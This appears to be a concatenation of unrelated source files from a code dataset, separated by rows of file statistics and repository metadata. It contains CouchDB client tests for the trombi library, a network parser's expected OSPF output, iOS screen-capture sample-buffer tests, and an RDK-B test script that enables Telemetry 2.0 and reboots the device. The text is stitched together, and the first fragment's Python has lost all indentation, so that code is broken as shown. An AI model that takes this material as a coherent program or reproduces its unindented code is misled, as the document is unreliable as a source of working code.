def got_doc(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
doc.load_attachment('foo', loaded_attachment)
def loaded_attachment(attach):
eq(attach, 'bar')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_copy_loaded_document_with_attachments_true(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
attachments={'foo': (None, 'bar')}
)
def create_doc_callback(doc):
doc.db.get(doc.id, got_doc, attachments=True)
def got_doc(doc):
doc.copy('newname', copy_done)
def copy_done(doc):
eq(doc.id, 'newname')
eq(dict(doc), {'testvalue': 'something'})
eq(doc.attachments.keys(), ['foo'])
eq(doc.attachments['foo']['content_type'], 'text/plain')
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_create_document_raw(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': 'something'},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc.raw(),
{
'_id': doc.id,
'_rev': doc.rev,
'testvalue': 'something',
})
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=create_db_callback)
ioloop.start()
@with_ioloop
@with_couchdb
def test_view_results_with_offset(baseurl, ioloop):
def do_test(db):
def create_view_callback(response):
eq(response.code, 201)
db.set({'data': 'data'}, create_first_doc_cb)
def create_first_doc_cb(response):
db.set({'another': 'data'}, create_docs_cb)
def create_docs_cb(doc):
db.view('testview', 'all', load_view_cb, skip=1)
def load_view_cb(result):
eq(result.error, False)
eq(len(result), 1)
eq(result.total_rows, 2)
eq(result.offset, 1)
ioloop.stop()
db.server._fetch(
'%stestdb/_design/testview' % baseurl,
create_view_callback,
method='PUT',
body=json.dumps(
{
'language': 'javascript',
'views': {
'all': {
'map': 'function (doc) { emit(null, doc) }',
}
}
}
)
)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_insert(baseurl, ioloop):
def do_test(db):
datas = [
{'key1': 'data1'},
{'key2': 'data2'},
]
db.bulk_docs(datas, bulks_cb)
def bulks_cb(response):
assert not response.error
eq(len(response), 2)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
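# CouchDB's _bulk_docs endpoint treats any document carrying
# '_deleted': True as a deletion, which the bulk delete and mixed
# operation tests below rely on.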
@with_ioloop
@with_couchdb
def test_bulk_delete(baseurl, ioloop):
def do_test(db):
def bulks_cb(response):
datas = []
for doc in response:
datas.append(dict(doc))
datas[-1]['_deleted'] = True
db.bulk_docs(datas, bulks_delete_cb)
def bulks_delete_cb(response):
eq(response.error, False)
eq(len(response), 2)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
datas = [
{'key1': 'data1'},
{'key2': 'data2'},
]
db.bulk_docs(datas, bulks_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_mixed(baseurl, ioloop):
def do_test(db):
def bulks_cb(response):
datas = [dict(response[0])]
datas[0]['_deleted'] = True
db.bulk_docs(datas, bulks_delete_cb)
def bulks_delete_cb(response):
eq(response.error, False)
eq(len(response), 1)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
datas = [
{'key1': 'data1'},
{'key2': 'data2'},
]
db.bulk_docs(datas, bulks_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_conflict(baseurl, ioloop):
def do_test(db):
def bulks_cb(response):
db.bulk_docs([{
'_id': 'foobar', 'key1': 'data2'
}], bulks_update_cb)
def bulks_update_cb(response):
eq(response.error, False)
eq(len(response), 1)
assert all(isinstance(x, trombi.BulkError) for x in response)
eq(response[0].reason, 'Document update conflict.')
ioloop.stop()
datas = [
{'_id': 'foobar', 'key1': 'data1'},
]
db.bulk_docs(datas, bulks_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_insert_with_doc(baseurl, ioloop):
def do_test(db):
def doc_created_cb(response):
response['some'] = 'other'
db.bulk_docs([response], bulks_cb)
def bulks_cb(response):
assert not response.error
eq(len(response), 1)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
db.set('mydoc', {'some': 'data'}, doc_created_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_bulk_insert_mixed(baseurl, ioloop):
def do_test(db):
def doc_created_cb(response):
response['some'] = 'other'
db.bulk_docs([response, {'other': 'doc'}], bulks_cb)
def bulks_cb(response):
assert not response.error
eq(len(response), 2)
assert all(isinstance(x, trombi.BulkObject) for x in response)
ioloop.stop()
db.set('mydoc', {'some': 'data'}, doc_created_cb)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
@with_ioloop
@with_couchdb
def test_continuous_changes_feed(baseurl, ioloop):
def do_test(db):
runs = []
def _got_change(change):
runs.append(True)
if len(runs) == 1:
# First pass, this should be the change
change['changes'][0].pop('rev')
eq(change, {'seq': 1, 'id': 'mydoc', 'changes': [{}]})
ioloop.stop()
def doc_created(response):
assert not response.error
db.changes(_got_change, feed='continuous')
db.set('mydoc', {'some': 'data'}, doc_created)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
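# CouchDB supports several changes-feed modes: 'continuous' keeps the
# connection open and streams one JSON object per change, while
# 'longpoll' returns a single response once at least one change is
# available. The next two tests exercise the longpoll mode.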
@with_ioloop
@with_couchdb
def test_long_polling_changes_feed(baseurl, ioloop):
changes = []
def do_test(db):
def _got_change(change):
changes.append(change.content)
ioloop.stop()
def doc_created(response):
assert not response.error
db.changes(_got_change, feed='longpoll')
db.set('mydoc', {'some': 'data'}, doc_created)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
changes[0]['results'][0]['changes'][0].pop('rev')
eq(changes[0], {'last_seq': 1, 'results': [{
'changes': [{}], 'id': 'mydoc', 'seq': 1}]})
@with_ioloop
@with_couchdb
def test_long_polling_before_doc_created(baseurl, ioloop):
changes = []
def do_test(db):
def _got_change(change):
changes.append(change.content)
ioloop.stop()
def doc_created(response):
assert not response.error
db.changes(_got_change, feed='longpoll', timeout=2)
db.set('mydoc', {'some': 'data'}, doc_created)
s = trombi.Server(baseurl, io_loop=ioloop)
s.create('testdb', callback=do_test)
ioloop.start()
changes[0]['results'][0]['changes'][0].pop('rev')
eq(changes[0], {'last_seq': 1, 'results': [{
'changes': [{}], 'id': 'mydoc', 'seq': 1}]})
def test_custom_encoder():
s = trombi.Server('http://localhost:5984', json_encoder=DatetimeEncoder)
json.dumps({'foo': datetime.now()}, cls=s._json_encoder)
def test_custom_encoder_from_uri():
db = trombi.from_uri('http://localhost:5984/testdb/',
json_encoder=DatetimeEncoder)
json.dumps({'foo': datetime.now()}, cls=db._json_encoder)
@with_ioloop
@with_couchdb
def test_create_document_with_custom_encoder(baseurl, ioloop):
def create_db_callback(db):
db.set(
{'testvalue': datetime(1900, 1, 1)},
create_doc_callback,
)
def create_doc_callback(doc):
eq(doc.error, False)
assert isinstance(doc, trombi.Document)
assert doc.id
assert doc.rev
eq(doc['testvalue'], datetime(1900, 1, 1))
ioloop.stop()
s = trombi.Server(baseurl, io_loop=ioloop, json_encoder=DatetimeEncoder)
s.create('testdb', callback=create_db_callback)
ioloop.start()
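# A minimal sketch of the DatetimeEncoder these encoder tests assume: a
# json.JSONEncoder subclass that turns datetime objects into strings. The
# real definition lives elsewhere in the suite; this commented version is
# illustrative only, not the canonical implementation.
#
# class DatetimeEncoder(json.JSONEncoder):
#     def default(self, obj):
#         if isinstance(obj, datetime):
#             return obj.isoformat()
#         return json.JSONEncoder.default(self, obj)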
| 27.490233
| 77
| 0.581223
| 5,111
| 43,627
| 4.762473
| 0.069458
| 0.018693
| 0.033647
| 0.052627
| 0.83156
| 0.812456
| 0.798118
| 0.782959
| 0.769771
| 0.747504
| 0
| 0.00533
| 0.29468
| 43,627
| 1,586
| 78
| 27.507566
| 0.785707
| 0.027643
| 0
| 0.725649
| 0
| 0
| 0.10447
| 0.005614
| 0
| 0
| 0
| 0
| 0.038149
| 1
| 0.193182
| false
| 0
| 0.008929
| 0
| 0.20211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| aa8bbbe2ab28c28e064c6f59d57341f17301ccfa
| 2,041
| py
| Python
| src/genie/libs/parser/iosxe/tests/ShowIpOspfFastRerouteTiLfa/cli/equal/golden_output2_expected.py
| balmasea/genieparser
| d1e71a96dfb081e0a8591707b9d4872decd5d9d3
| ["Apache-2.0"] | 204
| 2018-06-27T00:55:27.000Z
| 2022-03-06T21:12:18.000Z
| src/genie/libs/parser/iosxe/tests/ShowIpOspfFastRerouteTiLfa/cli/equal/golden_output2_expected.py
| balmasea/genieparser
| d1e71a96dfb081e0a8591707b9d4872decd5d9d3
| ["Apache-2.0"] | 468
| 2018-06-19T00:33:18.000Z
| 2022-03-31T23:23:35.000Z
| src/genie/libs/parser/iosxe/tests/ShowIpOspfFastRerouteTiLfa/cli/equal/golden_output2_expected.py
| balmasea/genieparser
| d1e71a96dfb081e0a8591707b9d4872decd5d9d3
| ["Apache-2.0"] | 309
| 2019-01-16T20:21:07.000Z
| 2022-03-30T12:56:41.000Z
|
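# Golden expected output for the IOS-XE ShowIpOspfFastRerouteTiLfa parser
# ('show ip ospf fast-reroute ti-lfa'): per OSPF process, the router id
# plus the IPFRR/SR/TI-LFA state of each OSPF object (process, area,
# interfaces, AS external).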
expected_output = {
"process_id": {
65109: {
"router_id": "10.4.1.1",
"ospf_object": {
"Process ID (65109)": {
"ipfrr_enabled": "no",
"sr_enabled": "yes",
"ti_lfa_configured": "yes",
"ti_lfa_enabled": "yes (inactive)",
},
"Area 8": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "yes",
"ti_lfa_enabled": "yes",
},
"Loopback0": {
"ipfrr_enabled": "yes",
"sr_enabled": "no",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes (inactive)",
},
"GigabitEthernet5": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"GigabitEthernet4": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"GigabitEthernet3": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"GigabitEthernet2": {
"ipfrr_enabled": "yes",
"sr_enabled": "yes",
"ti_lfa_configured": "no",
"ti_lfa_enabled": "yes",
},
"AS external": {
"ipfrr_enabled": "no",
"sr_enabled": "yes",
"ti_lfa_configured": "yes",
"ti_lfa_enabled": "yes (inactive)",
},
},
}
}
}
| 35.189655
| 55
| 0.343459
| 140
| 2,041
| 4.635714
| 0.207143
| 0.323575
| 0.123267
| 0.1849
| 0.761171
| 0.711864
| 0.711864
| 0.711864
| 0.662558
| 0.639445
| 0
| 0.021538
| 0.522293
| 2,041
| 57
| 56
| 35.807018
| 0.644103
| 0
| 0
| 0.54386
| 0
| 0
| 0.342479
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 2aca00ff6ce397cc34b5cdeeb5097e6273d7258d
| 3,266
| py
| Python
| test_case/test_sample_buffer.py
| YueChen-C/ios-screen-record
| ca8cc488e3ee3eb2e43d25ebb02f669aa968508c
| ["MIT"] | 105
| 2021-03-17T05:32:50.000Z
| 2022-03-30T06:35:25.000Z
| test_case/test_sample_buffer.py
| jiangsikai/ios-screen-record
| ca8cc488e3ee3eb2e43d25ebb02f669aa968508c
| ["MIT"] | 10
| 2021-03-23T03:06:06.000Z
| 2022-01-21T08:05:46.000Z
| test_case/test_sample_buffer.py
| jiangsikai/ios-screen-record
| ca8cc488e3ee3eb2e43d25ebb02f669aa968508c
| ["MIT"] | 21
| 2021-03-18T03:27:16.000Z
| 2022-03-29T02:36:01.000Z
|
import struct
from ioscreen.coremedia.CMSampleBuffer import CMSampleBuffer
from ioscreen.coremedia.CMTime import CMTimeConst
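# These tests parse binary fixtures captured from the iOS screen-mirroring
# protocol. The slices (data[20:], data[16:]) skip a packet header before
# the serialized CMSampleBuffer payload; the header sizes are inferred
# from the slicing here rather than documented in this file.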
def test_feed_data():
with open('./fixtures/asyn-feed-ttas-only', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesVideo(data[20:])
assert False == sbufPacket.HasFormatDescription
print(sbufPacket)
def test_CMSampleBuffer():
with open('./fixtures/asyn-feed', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesVideo(data[20:])
assert True == sbufPacket.HasFormatDescription
assert CMTimeConst.KCMTimeFlagsHasBeenRounded == sbufPacket.OutputPresentationTimestamp.CMTimeFlags
assert 0x176a7 == sbufPacket.OutputPresentationTimestamp.seconds()
assert 1 == len(sbufPacket.SampleTimingInfoArray)
assert 0 == sbufPacket.SampleTimingInfoArray[0].Duration.seconds()
assert 0x176a7 == sbufPacket.SampleTimingInfoArray[0].PresentationTimeStamp.seconds()
assert 0 == sbufPacket.SampleTimingInfoArray[0].DecodeTimeStamp.seconds()
assert 90750 == len(sbufPacket.SampleData)
assert 1 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 90750 == sbufPacket.SampleSizes[0]
assert 4 == len(sbufPacket.Attachments)
assert 1 == len(sbufPacket.CreateIfNecessary)
print(sbufPacket)
def test_CMSampleBufferNoFdsc():
with open('./fixtures/asyn-feed-nofdsc', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesVideo(data[16:])
assert False == sbufPacket.HasFormatDescription
assert CMTimeConst.KCMTimeFlagsHasBeenRounded == sbufPacket.OutputPresentationTimestamp.CMTimeFlags
assert 0x44b82fa09 == sbufPacket.OutputPresentationTimestamp.seconds()
assert 1 == len(sbufPacket.SampleTimingInfoArray)
assert 0 == sbufPacket.SampleTimingInfoArray[0].Duration.seconds()
assert 0x44b82fa09 == sbufPacket.SampleTimingInfoArray[0].PresentationTimeStamp.seconds()
assert 0 == sbufPacket.SampleTimingInfoArray[0].DecodeTimeStamp.seconds()
assert 56604 == len(sbufPacket.SampleData)
assert 1 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 56604 == sbufPacket.SampleSizes[0]
assert 4 == len(sbufPacket.Attachments)
assert 2 == len(sbufPacket.CreateIfNecessary)
print(sbufPacket)
def test_CMSampleBufferAudio():
with open('./fixtures/asyn-eat', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesAudio(data[16:])
assert True == sbufPacket.HasFormatDescription
assert 1024 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 4 == sbufPacket.SampleSizes[0]
assert sbufPacket.NumSamples * sbufPacket.SampleSizes[0] == len(sbufPacket.SampleData)
print(sbufPacket)
def test_CMSampleBufferAudioNoFdsc():
with open('./fixtures/asyn-eat-nofdsc', "rb") as f:
data = f.read()
sbufPacket = CMSampleBuffer.from_bytesAudio(data[16:])
assert False == sbufPacket.HasFormatDescription
assert 1024 == sbufPacket.NumSamples
assert 1 == len(sbufPacket.SampleSizes)
assert 4 == sbufPacket.SampleSizes[0]
assert sbufPacket.NumSamples * sbufPacket.SampleSizes[0] == len(sbufPacket.SampleData)
print(sbufPacket)
| 39.829268
| 103
| 0.740661
| 327
| 3,266
| 7.363914
| 0.183486
| 0.075581
| 0.02907
| 0.05814
| 0.861296
| 0.80897
| 0.80897
| 0.758306
| 0.758306
| 0.603821
| 0
| 0.033213
| 0.151868
| 3,266
| 81
| 104
| 40.320988
| 0.836101
| 0
| 0
| 0.630769
| 0
| 0
| 0.040454
| 0.025437
| 0
| 0
| 0.011033
| 0
| 0.569231
| 1
| 0.076923
| false
| 0
| 0.046154
| 0
| 0.123077
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 2ae978f617f37165f9ba7e7a19768707b32b9f97
| 18,842
| py
| Python
| testscripts/RDKB/component/PAM/TS_PAM_Enable2.0TelemetryVersion.py
| rdkcmf/rdkb-tools-tdkb
| 9f9c3600cd701d5fc90ac86a6394ebd28d49267e
| ["Apache-2.0"] | null | null | null
| testscripts/RDKB/component/PAM/TS_PAM_Enable2.0TelemetryVersion.py
| rdkcmf/rdkb-tools-tdkb
| 9f9c3600cd701d5fc90ac86a6394ebd28d49267e
| ["Apache-2.0"] | null | null | null
| testscripts/RDKB/component/PAM/TS_PAM_Enable2.0TelemetryVersion.py
| rdkcmf/rdkb-tools-tdkb
| 9f9c3600cd701d5fc90ac86a6394ebd28d49267e
| ["Apache-2.0"] | null | null | null
|
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>3</version>
<name>TS_PAM_Enable2.0TelemetryVersion</name>
<primitive_test_id/>
<primitive_test_name>pam_GetParameterNames</primitive_test_name>
<primitive_test_version>1</primitive_test_version>
<status>FREE</status>
<synopsis>To enable 2.0 telemetry and check if telemetry2_0 is running</synopsis>
<groups_id/>
<execution_time>30</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_PAM_164</test_case_id>
<test_objective>This test case is to enable 2.0 telemetry and check if telemetry2_0 is running</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1. Ccsp components should be in a running state on the DUT
2. TDK Agent should be in a running state, or invoke it through the StartTdk.sh script</pre_requisite>
<api_or_interface_used>N/A</api_or_interface_used>
<input_parameters>Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version
Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL
Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable</input_parameters>
<automation_approch>1. Load the module
2. Get the Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable status; if disabled, enable it.
3. Get the Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version, which should be 2.0.1 once telemetry is enabled.
4. Set the Config URL using Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL
5. Initiate a reboot
6. Check if the telemetry2_0.txt.0 file is present
7. Check the pid of telemetry2_0; the process should be running.
8. Revert the set parameters to their previous values.
9. Unload the module</automation_approch>
<expected_output>On Enabling telemetry and after a successful reboot telemetry2_0 should be running</expected_output>
<priority>High</priority>
<test_stub_interface>PAM</test_stub_interface>
<test_script>TS_PAM_Enable2.0TelemetryVersion</test_script>
<skipped>No</skipped>
<release_version>M79</release_version>
<remarks>None</remarks>
</test_cases>
<script_tags/>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from time import sleep;
from tdkbVariables import *;
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("sysutil","1");
obj1= tdklib.TDKScriptingLibrary("tdkbtr181","1");
#IP and Port of box, No need to change,
#This will be replaced with corresponding DUT Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_PAM_Enable2.0TelemetryVersion');
obj1.configureTestCase(ip,port,'TS_PAM_Enable2.0TelemetryVersion');
#Get the result of connection with test component and DUT
loadmodulestatus=obj.getLoadModuleResult();
loadmodulestatus1=obj1.getLoadModuleResult();
setflag = 1;
revertflag =0;
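# setflag is cleared when enabling telemetry fails, skipping the remaining
# steps; revertflag records that Telemetry.Enable was modified so the
# original value can be restored at the end of the test.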
if "SUCCESS" in loadmodulestatus.upper() and "SUCCESS" in loadmodulestatus1.upper() :
#Set the result status of execution
obj.setLoadModuleStatus("SUCCESS");
obj1.setLoadModuleStatus("SUCCESS");
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
default = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get the Telemetry Enable status";
print "EXPECTED RESULT 1: Should get the Telemetry Enable status";
print "ACTUAL RESULT 1: Telemetry Enable status is:",default
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
if default != "true":
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Enable");
tdkTestObj.addParameter("ParamValue","true");
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the Telemetry Enable status to true";
print "EXPECTED RESULT 2: Should set the Telemetry Enable status to true";
print "ACTUAL RESULT 2: Telemetry Enable status is:",details
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
revertflag =1;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set the Telemetry Enable status to true";
print "EXPECTED RESULT 2: Should set the Telemetry Enable status to true";
print "ACTUAL RESULT 2: Telemetry Enable status is:",details
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
setflag =0;
if setflag ==1:
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.Version");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
telver = tdkTestObj.getResultDetails();
if expectedresult in actualresult and telver == "2.0.1":
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Get the current Telemetry version in the DUT after Telemetry Enable ";
print "EXPECTED RESULT 3: Should get the current Telemetry version as 2.0.1 in the DUT"
print "ACTUAL RESULT 3: ",telver;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
defURL = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Get the current Telemetry ConfigURL";
print "EXPECTED RESULT 4: Should get the current Telemetry ConfigURL";
print "ACTUAL RESULT 4: ",defURL;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL");
tdkTestObj.addParameter("ParamValue",TEL_CONFIG_URL);
tdkTestObj.addParameter("Type","string");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 5: Set the Telemetry ConfigURL";
print "EXPECTED RESULT 5: Should set the Telemetry ConfigURL";
print "ACTUAL RESULT 5: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
print "***************************************************"
print "Initiating Reboot Please wait till the device comes up";
print"*******************************************************"
obj.initiateReboot();
sleep(300);
tdkTestObj = obj.createTestStep('ExecuteCmd');
cmd= "[ -f /rdklogs/logs/telemetry2_0.txt.0 ] && echo \"File exist\" || echo \"File does not exist\"";
expectedresult="SUCCESS";
tdkTestObj.addParameter("command",cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if details == "File exist" :
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 6: Check for telemetry2_0.txt.0 log file presence";
print "EXPECTED RESULT 6: telemetry2_0.txt.0 log file should be present";
print "ACTUAL RESULT 6: telemetry2_0.txt.0 file is present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep('ExecuteCmd');
cmd = "pidof telemetry2_0";
expectedresult="SUCCESS";
tdkTestObj.addParameter("command",cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if expectedresult in actualresult and details != "":
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 7: Check if telemetry2_0 process is running";
print "EXPECTED RESULT 7:telemetry2_0 process should be running";
print "ACTUAL RESULT 7: pid of telemetry2_0",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 7: Check if telemetry2_0 process is running";
print "EXPECTED RESULT 7:telemetry2_0 process should be running";
print "ACTUAL RESULT78: pid of telemetry2_0",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 6: Check for telemetry2_0.txt.0 log file presence";
print "EXPECTED RESULT 6: telemetry2_0.txt.0 log file should be present";
print "ACTUAL RESULT 6: telemetry2_0.txt.0 file is not present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
#Revert the URL
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.Telemetry.ConfigURL");
tdkTestObj.addParameter("ParamValue",defURL);
tdkTestObj.addParameter("Type","string");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 8: Revert the Telemetry ConfigURL to previous";
print "EXPECTED RESULT 8: Should revert the Telemetry ConfigURL";
print "ACTUAL RESULT 8: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 8: Revert the Telemetry ConfigURL to previous";
print "EXPECTED RESULT 8: Should revert the Telemetry ConfigURL";
print "ACTUAL RESULT 8: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 5: Set the Telemetry ConfigURL";
print "EXPECTED RESULT 5: Should set the Telemetry ConfigURL";
print "ACTUAL RESULT 5: ",details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Get the current Telemetry ConfigURL";
print "EXPECTED RESULT 4: Should get the current Telemetry ConfigURL";
print "ACTUAL RESULT 4: ",defURL;
